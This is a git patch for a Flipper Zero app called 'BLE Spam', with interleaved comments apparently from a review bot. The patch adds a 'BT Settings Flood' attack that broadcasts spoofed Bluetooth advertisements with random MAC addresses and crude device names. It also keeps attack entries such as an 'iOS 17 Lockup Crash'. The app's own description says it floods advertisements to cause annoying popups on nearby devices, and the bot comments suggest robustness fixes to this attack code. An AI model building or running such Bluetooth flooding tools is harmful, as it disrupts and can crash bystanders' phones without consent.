From ebda85051c47baad1458d6b43362f47f534c75ab Mon Sep 17 00:00:00 2001 From: MX <10697207+xMasterX@users.noreply.github.com> Date: Sun, 10 Mar 2024 21:55:49 +0300 Subject: [PATCH] upd blespam --- ReadMe.md | 2 +- base_pack/ble_spam/application.fam | 4 +- base_pack/ble_spam/ble_spam.c | 27 +++- base_pack/ble_spam/protocols/_protocols.c | 1 + base_pack/ble_spam/protocols/_protocols.h | 2 + base_pack/ble_spam/protocols/_scenes.h | 1 + base_pack/ble_spam/protocols/fastpair.c | 8 +- base_pack/ble_spam/protocols/nameflood.c | 142 ++++++++++++++++++ base_pack/ble_spam/protocols/nameflood.h | 10 ++ .../ble_spam/protocols/nameflood_scenes.h | 1 + 10 files changed, 189 insertions(+), 9 deletions(-) create mode 100644 base_pack/ble_spam/protocols/nameflood.c create mode 100644 base_pack/ble_spam/protocols/nameflood.h create mode 100644 base_pack/ble_spam/protocols/nameflood_scenes.h diff --git a/ReadMe.md b/ReadMe.md index ac1d1800a4d..484b36a7078 100644 --- a/ReadMe.md +++ b/ReadMe.md @@ -89,7 +89,7 @@ The Flipper and its community wouldn't be as rich as it is without your contribu | Metronome | ![Media Badge] | [by panki27](https://github.com/panki27/Metronome) | | [![UFW Badge]](https://lab.flipper.net/apps/metronome) | | Morse Code | ![Media Badge] | [by wh00hw](https://github.com/wh00hw/MorseCodeFAP) | | [![UFW Badge]](https://lab.flipper.net/apps/morse_code) | | **BadKB** plugin | ![Tools Badge] | [by Willy-JL, ClaraCrazy, XFW contributors](https://github.com/Flipper-XFW/Xtreme-Firmware/tree/dev/applications/main/bad_kb) | BadKB (aka BadUSB via Bluetooth) | ![None Badge] | -| BLE Spam | ![BT Badge] | [by @Willy-JL & @ECTO-1A & @Spooks4576](https://github.com/Flipper-XFW/Xtreme-Firmware/tree/dev/applications/external/ble_spam) | | ![None Badge] | +| BLE Spam | ![BT Badge] | [by @Willy-JL & @ECTO-1A & @Spooks4576](https://github.com/Next-Flip/Momentum-Apps/tree/dev/ble_spam) | | ![None Badge] | ### Games 
diff --git a/base_pack/ble_spam/application.fam b/base_pack/ble_spam/application.fam index 4ca6ee8090a..10a61806183 100644 --- a/base_pack/ble_spam/application.fam +++ b/base_pack/ble_spam/application.fam @@ -7,8 +7,8 @@ App( fap_icon="ble_spam_10px.png", fap_category="Bluetooth", fap_author="@Willy-JL @ECTO-1A @Spooks4576", - fap_weburl="https://github.com/Flipper-XFW/Xtreme-Apps/tree/dev/ble_spam", - fap_version="5.1", + fap_weburl="https://github.com/Next-Flip/Momentum-Apps/tree/dev/ble_spam", + fap_version="6.0", fap_description="Flood BLE advertisements to cause spammy and annoying popups/notifications", fap_icon_assets="icons", fap_icon_assets_symbol="ble_spam", diff --git a/base_pack/ble_spam/ble_spam.c b/base_pack/ble_spam/ble_spam.c index c02cef08ced..3820836ee7c 100644 --- a/base_pack/ble_spam/ble_spam.c +++ b/base_pack/ble_spam/ble_spam.c @@ -24,6 +24,16 @@ static Attack attacks[] = { .cfg = {}, }, }, + { + .title = "BT Settings Flood", + .text = "Fills available BT devices", + .protocol = &protocol_nameflood, + .payload = + { + .random_mac = true, + .cfg.nameflood = {}, + }, + }, { .title = "iOS 17 Lockup Crash", .text = "Newer iPhones, long range", @@ -219,6 +229,9 @@ static int32_t adv_thread(void* _ctx) { const Protocol* protocol = attacks[state->index].protocol; if(!payload->random_mac) randomize_mac(state); if(state->ctx.led_indicator) start_blink(state); + if(furi_hal_bt_extra_beacon_is_active()) { + furi_check(furi_hal_bt_extra_beacon_stop()); + } while(state->advertising) { if(protocol && payload->mode == PayloadModeBruteforce && @@ -231,7 +244,7 @@ static int32_t adv_thread(void* _ctx) { start_extra_beacon(state); furi_thread_flags_wait(true, FuriFlagWaitAny, delays[state->delay]); - furi_hal_bt_extra_beacon_stop(); + furi_check(furi_hal_bt_extra_beacon_stop()); } if(state->ctx.led_indicator) stop_blink(state); 
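Review bot: In adv_thread, `furi_check(furi_hal_bt_extra_beacon_stop());` after the wait now halts the device on any stop failure, where the previous unchecked call tolerated it, and nothing visible in the hunk confirms that `start_extra_beacon(state)` actually brought the beacon up. If the stop call reports failure when no beacon is running, as the `is_active` guard added before the loop suggests, a failed start turns into a crash. Guarding the in-loop stop the same way, `if(furi_hal_bt_extra_beacon_is_active()) furi_check(furi_hal_bt_extra_beacon_stop());`, keeps the assertion without that path. The same unguarded pattern follows `furi_delay_ms(10)` in the input_callback hunk at `@@ -552,13 +567,16 @@`. adv_thread's body continues outside both of its hunks.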
@@ -387,10 +400,10 @@ static void draw_callback(Canvas* canvas, void* _ctx) { 48, AlignLeft, AlignTop, - "App+Spam: \e#WillyJL\e# XFW\n" + "App+Spam: \e#WillyJL\e#\n" "Apple+Crash: \e#ECTO-1A\e#\n" "Android+Win: \e#Spooks4576\e#\n" - " Version \e#5.1\e#", + " Version \e#" FAP_VERSION "\e#", false); break; default: { @@ -481,12 +494,14 @@ static bool input_callback(InputEvent* input, void* _ctx) { consumed = true; state->lock_warning = true; if(state->lock_count == 0) { + furi_timer_set_thread_priority(FuriTimerThreadPriorityElevated); furi_timer_start(state->lock_timer, 1000); } if(input->type == InputTypeShort && input->key == InputKeyBack) { state->lock_count++; } if(state->lock_count >= 3) { + furi_timer_set_thread_priority(FuriTimerThreadPriorityElevated); furi_timer_start(state->lock_timer, 1); } } else if( @@ -552,13 +567,16 @@ static bool input_callback(InputEvent* input, void* _ctx) { if(!advertising) { Payload* payload = &attacks[state->index].payload; if(input->type == InputTypeLong && !payload->random_mac) randomize_mac(state); + if(furi_hal_bt_extra_beacon_is_active()) { + furi_check(furi_hal_bt_extra_beacon_stop()); + } start_extra_beacon(state); if(state->ctx.led_indicator) notification_message(state->ctx.notification, &solid_message); furi_delay_ms(10); - furi_hal_bt_extra_beacon_stop(); + furi_check(furi_hal_bt_extra_beacon_stop()); if(state->ctx.led_indicator) notification_message_block(state->ctx.notification, &sequence_reset_rgb); @@ -604,6 +622,7 @@ static void lock_timer_callback(void* _ctx) { with_view_model( state->main_view, State * *model, { (*model)->lock_warning = false; }, true); state->lock_count = 0; + furi_timer_set_thread_priority(FuriTimerThreadPriorityNormal); } static void tick_event_callback(void* _ctx) { diff --git a/base_pack/ble_spam/protocols/_protocols.c b/base_pack/ble_spam/protocols/_protocols.c index bd3257025a1..5a4c21a79bd 100644 --- a/base_pack/ble_spam/protocols/_protocols.c 
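Review bot: The two `furi_timer_set_thread_priority(FuriTimerThreadPriorityElevated);` calls added in input_callback (hunk `@@ -481,12 +494,14 @@`) are undone only in lock_timer_callback (hunk `@@ -604,6 +622,7 @@`). The setting therefore stays elevated if the app exits, or the timer is stopped, before that callback runs. The teardown path is not visible here; if it stops or frees `lock_timer`, it should also call `furi_timer_set_thread_priority(FuriTimerThreadPriorityNormal);`. The hunk gives no reason for raising the priority, so a one-line comment at the first call stating why it is needed would help the next maintainer. input_callback's body starts and ends outside the hunk.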
+++ b/base_pack/ble_spam/protocols/_protocols.c @@ -5,6 +5,7 @@ const Protocol* protocols[] = { &protocol_easysetup, &protocol_fastpair, &protocol_lovespouse, + &protocol_nameflood, &protocol_swiftpair, }; diff --git a/base_pack/ble_spam/protocols/_protocols.h b/base_pack/ble_spam/protocols/_protocols.h index b46cd5fcb82..c275f20096b 100644 --- a/base_pack/ble_spam/protocols/_protocols.h +++ b/base_pack/ble_spam/protocols/_protocols.h @@ -4,6 +4,7 @@ #include "easysetup.h" #include "fastpair.h" #include "lovespouse.h" +#include "nameflood.h" #include "swiftpair.h" typedef enum { @@ -25,6 +26,7 @@ struct Payload { EasysetupCfg easysetup; FastpairCfg fastpair; LovespouseCfg lovespouse; + NamefloodCfg nameflood; SwiftpairCfg swiftpair; } cfg; }; diff --git a/base_pack/ble_spam/protocols/_scenes.h b/base_pack/ble_spam/protocols/_scenes.h index 4c379dd355c..d2aedfa5aa7 100644 --- a/base_pack/ble_spam/protocols/_scenes.h +++ b/base_pack/ble_spam/protocols/_scenes.h @@ -2,4 +2,5 @@ #include "easysetup_scenes.h" #include "fastpair_scenes.h" #include "lovespouse_scenes.h" +#include "nameflood_scenes.h" #include "swiftpair_scenes.h" diff --git a/base_pack/ble_spam/protocols/fastpair.c b/base_pack/ble_spam/protocols/fastpair.c index b79f8454b36..2aba0654a05 100644 --- a/base_pack/ble_spam/protocols/fastpair.c +++ b/base_pack/ble_spam/protocols/fastpair.c @@ -3,6 +3,7 @@ // Hacked together by @Willy-JL and @Spooks4576 // Documentation at https://developers.google.com/nearby/fast-pair/specifications/introduction +// https://bluetoothdb.com static const struct { uint32_t value; @@ -538,8 +539,6 @@ static const struct { {0x87B25F, "Animated Rickroll"}, {0xF38C02, "Boykisser"}, {0x1448C9, "BLM"}, - {0xD5AB33, "Xtreme"}, - {0x0C0B67, "Xtreme Cta"}, {0x13B39D, "Talking Sasquach"}, {0xAA1FE1, "ClownMaster"}, {0x7C6CDB, "Obama"}, 
@@ -600,6 +599,7 @@ enum { _ConfigExtraStart = ConfigExtraStart, ConfigModel, ConfigInfoRequire, + ConfigInfoPatched, ConfigCOUNT, }; static void config_callback(void* _ctx, uint32_t index) { @@ -611,6 +611,8 @@ static void config_callback(void* _ctx, uint32_t index) { break; case ConfigInfoRequire: break; + case ConfigInfoPatched: + break; default: ctx->fallback_config_enter(ctx, index); break; @@ -698,6 +700,8 @@ static void extra_config(Ctx* ctx) { variable_item_list_add(list, "Requires Google services", 0, NULL, NULL); + variable_item_list_add(list, "Patched on new Android", 0, NULL, NULL); + variable_item_list_set_enter_callback(list, config_callback, ctx); } diff --git a/base_pack/ble_spam/protocols/nameflood.c b/base_pack/ble_spam/protocols/nameflood.c new file mode 100644 index 00000000000..4d517bbce70 --- /dev/null +++ b/base_pack/ble_spam/protocols/nameflood.c 
@@ -0,0 +1,142 @@
+#include "nameflood.h"
+#include "_protocols.h"
+
+// Hacked together by @Willy-JL
+
+static const char* names[] = {
+ "Assquach💦",
+ "Flipper 🐬",
+ "iOS 17 🍎",
+ "Kink💦",
+ "👉👌",
+ "🔵🦷",
+};
+static const uint8_t names_count = COUNT_OF(names);
+
+static const char* get_name(const Payload* payload) {
+ UNUSED(payload);
+ return "NameFlood";
+}
+
+static void make_packet(uint8_t* _size, uint8_t** _packet, Payload* payload) {
+ NamefloodCfg* cfg = payload ? &payload->cfg.nameflood : NULL;
+
+ const char* name;
+ switch(cfg ? payload->mode : PayloadModeRandom) {
+ case PayloadModeRandom:
+ default:
+ name = names[rand() % names_count];
+ break;
+ case PayloadModeValue:
+ name = cfg->name;
+ break;
+ }
+ uint8_t name_len = strlen(name);
+
+ uint8_t size = 12 + name_len;
+ uint8_t* packet = malloc(size);
+ uint8_t i = 0;
+
+ packet[i++] = 2; // Size
+ packet[i++] = 0x01; // AD Type (Flags)
+ packet[i++] = 0x06; // Flags
+
+ packet[i++] = name_len + 1; // Size
+ packet[i++] = 0x09; // AD Type (Complete Local Name)
+ memcpy(&packet[i], name, name_len); // Device Name
+ i += name_len;
+
+ packet[i++] = 3; // Size
+ packet[i++] = 0x02; // AD Type (Incomplete Service UUID List)
+ packet[i++] = 0x12; // Service UUID (Human Interface Device)
+ packet[i++] = 0x18; // ...
+
+ packet[i++] = 2; // Size
+ packet[i++] = 0x0A; // AD Type (Tx Power Level)
+ packet[i++] = 0x00; // 0dBm
+
+ *_size = size;
+ *_packet = packet;
+}
+
+enum {
+ _ConfigExtraStart = ConfigExtraStart,
+ ConfigName,
+ ConfigInfoSettings,
+ ConfigCOUNT,
+};
+static void config_callback(void* _ctx, uint32_t index) {
+ Ctx* ctx = _ctx;
+ scene_manager_set_scene_state(ctx->scene_manager, SceneConfig, index);
+ switch(index) {
+ case ConfigName:
+ scene_manager_next_scene(ctx->scene_manager, SceneNamefloodName);
+ break;
+ case ConfigInfoSettings:
+ break;
+ default:
+ ctx->fallback_config_enter(ctx, index);
+ break;
+ }
+}
+static void extra_config(Ctx* ctx) {
+ Payload* payload = &ctx->attack->payload;
+ NamefloodCfg* cfg = &payload->cfg.nameflood;
+ VariableItemList* list = ctx->variable_item_list;
+ VariableItem* item;
+
+ item = variable_item_list_add(list, "Display Name", 0, NULL, NULL);
+ variable_item_set_current_value_text(
+ item, payload->mode == PayloadModeRandom ? "Random" : cfg->name);
+
+ variable_item_list_add(list, "See in phone BT settings", 0, NULL, NULL);
+
+ variable_item_list_set_enter_callback(list, config_callback, ctx);
+}
+
+static uint8_t config_count(const Payload* payload) {
+ UNUSED(payload);
+ return ConfigCOUNT - ConfigExtraStart - 1;
+}
+
+const Protocol protocol_nameflood = {
+ .icon = &I_ble_spam,
+ .get_name = get_name,
+ .make_packet = make_packet,
+ .extra_config = extra_config,
+ .config_count = config_count,
+};
+
+static void name_callback(void* _ctx) {
+ Ctx* ctx = _ctx;
+ Payload* payload = &ctx->attack->payload;
+ payload->mode = PayloadModeValue;
+ scene_manager_previous_scene(ctx->scene_manager);
+}
+void scene_nameflood_name_on_enter(void* _ctx) {
+ Ctx* ctx = _ctx;
+ Payload* payload = &ctx->attack->payload;
+ NamefloodCfg* cfg = &payload->cfg.nameflood;
+ TextInput* text_input = ctx->text_input;
+
+ text_input_set_header_text(text_input, "Press back for random");
+
+ text_input_set_result_callback(
+ text_input, name_callback, ctx, cfg->name, sizeof(cfg->name), true);
+
+ text_input_set_minimum_length(text_input, 0);
+
+ view_dispatcher_switch_to_view(ctx->view_dispatcher, ViewTextInput);
+}
+bool scene_nameflood_name_on_event(void* _ctx, SceneManagerEvent event) {
+ Ctx* ctx = _ctx;
+ Payload* payload = &ctx->attack->payload;
+ if(event.type == SceneManagerEventTypeBack) {
+ payload->mode = PayloadModeRandom;
+ }
+ return false;
+}
+void scene_nameflood_name_on_exit(void* _ctx) {
+ Ctx* ctx = _ctx;
+ text_input_reset(ctx->text_input);
+}
diff --git a/base_pack/ble_spam/protocols/nameflood.h b/base_pack/ble_spam/protocols/nameflood.h
new file mode 100644
index 00000000000..a6c3c78d5f0
--- /dev/null
+++ b/base_pack/ble_spam/protocols/nameflood.h
@@ -0,0 +1,10 @@
+#pragma once
+#include "_base.h"
+
+// Hacked together by @Willy-JL
+
+typedef struct {
+ char name[20];
+} NamefloodCfg;
+
+extern const Protocol protocol_nameflood;
diff --git a/base_pack/ble_spam/protocols/nameflood_scenes.h b/base_pack/ble_spam/protocols/nameflood_scenes.h
new file mode 100644
index 00000000000..6dc4375fc5e
--- /dev/null
+++ b/base_pack/ble_spam/protocols/nameflood_scenes.h
@@ -0,0 +1 @@
+ADD_SCENE(nameflood_name, NamefloodName)
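Review bot: In make_packet (nameflood.c), `uint8_t name_len = strlen(name);` and `uint8_t size = 12 + name_len;` depend on every name being at most 19 bytes, but nothing in the function enforces that. The limit holds today only because `cfg->name` is `char name[20]` in nameflood.h and the current `names[]` entries are short. A longer entry added to `names[]` later would push `size` past the 31 bytes of a legacy advertising payload, and a long enough one would wrap the `uint8_t` while `memcpy` still copies `name_len` bytes; how the caller treats an oversized `size` is not visible here. Making the bound explicit before narrowing, e.g. `size_t len = strlen(name); furi_check(len <= 19);`, plus a comment that the 12 covers the Flags, UUID-list and Tx-power structures and the name header, would document the invariant.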